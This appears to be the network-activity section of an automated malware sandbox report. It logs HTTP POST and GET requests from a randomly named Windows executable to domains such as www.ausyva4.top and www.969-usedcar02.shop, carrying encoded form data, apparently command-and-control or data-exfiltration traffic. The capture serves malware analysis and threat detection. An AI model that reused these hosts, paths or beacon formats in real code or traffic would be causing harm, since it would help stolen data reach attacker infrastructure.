                                                                  Jan 10, 2025 18:51:44.234657049 CET10821OUTPOST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 42 41 76 4d 4c 45 58 42 34 39 34 6d 68 63 56 7a 39 33 74 4c 56 59 30 4b 71 74 6c 6d 77 49 31 34 62 53 2b 71 4e 53 43 31 72 41 68 52 49 68 62 37 54 6e 63 78 75 77 52 64 6a 57 75 42 62 56 48 66 6a 49 37 7a 72 57 4f 4c 6d 32 62 48 48 53 5a 5a 4b 47 4b 6e 65 47 65 63 37 34 49 4d 6a 33 6c 75 45 32 57 41 64 43 67 4c 54 78 32 4c 74 66 43 6c 61 41 73 38 45 69 79 70 59 59 78 47 54 4b 77 62 70 32 49 52 4b 69 51 33 6b 46 62 53 64 35 74 66 34 46 77 38 5a 46 70 68 41 4b 44 42 7a 4c 71 79 4c 2f 63 62 62 76 32 64 38 6d 64 77 67 62 68 4a 65 79 6d 70 68 6e 69 6e 71 78 57 73 33 53 74 76 6e 42 72 6d 64 53 58 69 59 49 49 52 46 38 78 69 62 56 70 71 69 51 41 65 51 30 78 76 2b 50 74 39 30 77 63 5a 54 74 46 4e 4a 63 2f 31 6e 6b 75 4f 43 4a 39 6c 74 46 45 39 34 76 69 32 46 4f 74 45 38 4b 38 54 78 44 55 72 49 58 51 34 61 72 58 48 2f 6e 2b 64 70 48 69 42 47 62 66 50 49 30 6b 78 2b 48 42 48 50 [TRUNCATED]
                                                                  Data Ascii: 3h=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7BAvMLEXB494mhcVz93tLVY0KqtlmwI14bS+qNSC1rAhRIhb7TncxuwRdjWuBbVHfjI7zrWOLm2bHHSZZKGKneGec74IMj3luE2WAdCgLTx2LtfClaAs8EiypYYxGTKwbp2IRKiQ3kFbSd5tf4Fw8ZFphAKDBzLqyL/cbbv2d8mdwgbhJeymphninqxWs3StvnBrmdSXiYIIRF8xibVpqiQAeQ0xv+Pt90wcZTtFNJc/1nkuOCJ9ltFE94vi2FOtE8K8TxDUrIXQ4arXH/n+dpHiBGbfPI0kx+HBHPvRg6+v0yPeSrGcadncJ/v006CZy8bgL6q8jCgr+0iwQ+z6af7p2GTJ4vZDHkLKmagGh6J9b1XGwIPDmsMU9MFV4qFUVecb22ZOt5K5qHfc6YvkLRBm+H6C4L28f8zDL+fIblhUAQtwSxNaQrdtBZUXCdryAz6saOc51YvS9FKxyqNJrW5HdR7t65OjiM0sCt33b5moHkqp2EOQOnP7CUP1l1qOIzdrgY8qxTaYFqpcILLUa9QxbZZoNOnlqtbsKwq/VYoeo85mCKoDK9eHeUkMEbPYTgpGuKb0QFFG2OfssHyPjZ/nzTR5P2VQrpJEMMbwqJHE697vZJKKV3jhhnaQ9z52hJCOJqqaZkcL/5ghOTvivVf8GXpUDIPCNs04bvIYRwchtEnuJLxCCf9oflGEuErVLV/T6nCXiDU3tOiwEa5oDPmcmFgq59fOchZFXOWrubYBfZSLLDeGNM06pWTx4H1Gde59km9xS2cILHFvq7LmVqpCxsqJ+vgO+mmtqgN4ZVZLFvMVeMa3sgqu41ReLLLPfyV+eQNNk/qKMTR2q/o36jm6cqRRvhhj29nlm8MtgfUijkog8rQhgSnSAX0fJ7O3K8tYe+/LvLDF0MExc991vZA6X5b2ppWXATS43P5k0+eBvspiPsqnKr5fr1SI10KgsE3GpFhb [TRUNCATED]
                                                                  Jan 10, 2025 18:51:44.929955006 CET1166INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:44 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJZRyA8oGJV%2BvpWSnvJ4DnZnyq4d8QE6LYC90EY7mXHaI5Khb039SPF1Z0PulEfbtmBL%2BOjGNNxunDkK%2BEvhLbpWU6VSU4yOHa3YCy%2FcQH8KfHG9IouIHGMSnguVW4pim8%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84507e89c330-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=22937&min_rtt=22937&rtt_var=11468&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 c5 1f 14 7f bf e0 12 ea 25 37 94 c8 c2 ba 85 0f e5 92 ee 53 11 8a [TRUNCATED]
                                                                  Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&%7S;"}px10


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449851104.21.48.233801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:46.916726112 CET457OUTGET /al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:51:47.516448975 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:47 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhOXLFHlqVpL8PAE1%2B8LR6Nao0YmNvSLmm%2F%2FOJHUqvhmlBWWTz9qrg13OQ9no8zUlN797BOQTl1bIWpGfQ5FMDlOfZj0404FX%2FGMJuzg0uCAFxa%2BxtR%2FHAt9SLqMhVzbBMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe8460be6d7cf0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f [TRUNCATED]
                                                                  Data Ascii: 2c2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
                                                                  Jan 10, 2025 18:51:47.516563892 CET256INData Raw: 74 72 45 56 44 75 2f 51 41 2f 4f 37 58 6f 47 7a 62 77 42 35 66 38 70 6a 6e 71 65 75 62 75 31 32 44 6c 4f 4c 65 78 66 33 67 3d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74
                                                                  Data Ascii: trEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g=</td></tr><tr><td>Server:</td><td>luodiye-aws-node1</td></tr><tr><td>Date:</td><td>2025/01/11 01:51:47</td></tr></table><hr/>Powered by X<hr><center>tengine</center></body></h


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.449882199.59.243.228801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:52.626663923 CET740OUTPOST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 46 68 6d 58 6e 7a 73 6e 45 57 6d 78 50 4e 49 36 77 66 43 34 45 6b 73 68 64 78 46 76 56 55 45 64 65 49 69 6c 6b 4f 64 59 6a 33 64 44 43 71 35 6a 38 52 70 7a 4c 5a 50 32 36 6e 4b 6d 66 62 62 69 43 61 43 4a 7a 6d 44 57 51 31 74 77 66 52 59 74 4f 61 38 57 6a 2f 71 2f 73 38 78 47 6e 4e 65 4a 4c 62 4b 59 62 61 4f 6b 52 47 56 6b 64 4e 48 73 30 53 47 70 39 6c 49 56 48 54 65 37 46 33 61 4e 75 46 2f 56 56 74 49 39 4e 34 69 46 42 33 2f 47 58 61 38 4d 79 55 6f 4b 2f 44 52 34 48 30 6a 66 34 7a 68 55 31 77 5a 4e 38 64 62 77 43 2b 53 4c 59 51 61 50 2b 51 3d 3d
                                                                  Data Ascii: 3h=/Hr8eDk/7MGMFhmXnzsnEWmxPNI6wfC4EkshdxFvVUEdeIilkOdYj3dDCq5j8RpzLZP26nKmfbbiCaCJzmDWQ1twfRYtOa8Wj/q/s8xGnNeJLbKYbaOkRGVkdNHs0SGp9lIVHTe7F3aNuF/VVtI9N4iFB3/GXa8MyUoK/DR4H0jf4zhU1wZN8dbwC+SLYQaP+Q==
                                                                  Jan 10, 2025 18:51:53.072082043 CET1236INHTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:52 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: 46c20837-e7e3-4aa3-99dd-5353070a6282
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=46c20837-e7e3-4aa3-99dd-5353070a6282; expires=Fri, 10 Jan 2025 18:06:53 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:51:53.072132111 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDZjMjA4MzctZTdlMy00YWEzLTk5ZGQtNTM1MzA3MGE2MjgyIiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449898199.59.243.228801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:55.168140888 CET760OUTPOST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 67 64 65 6f 53 6c 6a 50 64 59 69 33 64 44 4a 4b 35 6d 79 78 70 38 4c 5a 4c 45 36 6a 4b 6d 66 62 2f 69 43 66 2b 4a 7a 58 44 52 54 46 74 79 55 78 59 76 52 4b 38 57 6a 2f 71 2f 73 38 6c 38 6e 4e 6d 4a 4c 4c 61 59 59 37 4f 6e 59 6d 56 72 56 74 48 73 77 53 47 74 39 6c 49 37 48 53 79 46 46 30 69 4e 75 45 50 56 56 59 6f 38 44 49 69 66 5a 58 2b 77 53 35 4a 42 33 30 77 44 79 53 6c 6c 4a 33 2f 37 35 31 73 4f 6b 42 34 61 75 64 2f 44 66 35 62 2f 56 54 6e 47 6c 59 32 63 64 6f 4a 30 36 78 78 46 51 6c 73 4e 4d 66 52 44 62 32 38 3d
                                                                  Data Ascii: 3h=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmgdeoSljPdYi3dDJK5myxp8LZLE6jKmfb/iCf+JzXDRTFtyUxYvRK8Wj/q/s8l8nNmJLLaYY7OnYmVrVtHswSGt9lI7HSyFF0iNuEPVVYo8DIifZX+wS5JB30wDySllJ3/751sOkB4aud/Df5b/VTnGlY2cdoJ06xxFQlsNMfRDb28=
                                                                  Jan 10, 2025 18:51:55.715234995 CET1236INHTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:55 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: 4041aa37-1fce-4322-9a38-0c01192dcd8d
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=4041aa37-1fce-4322-9a38-0c01192dcd8d; expires=Fri, 10 Jan 2025 18:06:55 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:51:55.715260983 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA0MWFhMzctMWZjZS00MzIyLTlhMzgtMGMwMTE5MmRjZDhkIiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449913199.59.243.228801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:57.715754032 CET10842OUTPOST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 6f 64 65 5a 79 6c 6c 73 31 59 68 33 64 44 45 71 35 6e 79 78 70 62 4c 66 6a 41 36 6a 4f 51 66 64 37 69 44 35 71 4a 31 6c 6e 52 45 31 74 79 4a 68 59 71 4f 61 39 65 6a 37 48 32 73 38 31 38 6e 4e 6d 4a 4c 4f 65 59 50 36 4f 6e 65 6d 56 6b 64 4e 48 61 30 53 47 56 39 6c 77 4e 48 53 48 77 46 45 43 4e 70 6b 66 56 53 38 49 38 46 59 69 5a 61 58 2b 34 53 35 55 42 33 30 74 36 79 53 52 66 4a 77 58 37 34 45 4a 4f 33 69 77 6d 76 65 32 61 46 70 44 2b 64 42 58 35 39 6f 7a 6a 5a 4c 5a 53 73 52 42 4b 52 58 68 42 55 4f 46 48 43 42 32 42 48 76 69 2f 2b 74 53 70 5a 79 74 54 61 43 30 45 4f 6d 46 62 50 62 32 78 6b 68 56 64 50 41 61 42 53 76 6c 59 57 4e 43 44 58 77 4c 57 4c 32 75 48 76 70 6f 65 4f 6b 72 55 39 72 42 48 59 4e 65 38 5a 69 6a 51 74 32 44 79 46 47 2f 58 57 61 47 57 4c 71 66 45 36 61 35 71 6e 46 34 75 62 7a 2f 7a 67 43 72 2b 48 32 42 68 46 73 53 77 7a 68 48 35 79 56 4a 59 4a 4b 49 [TRUNCATED]
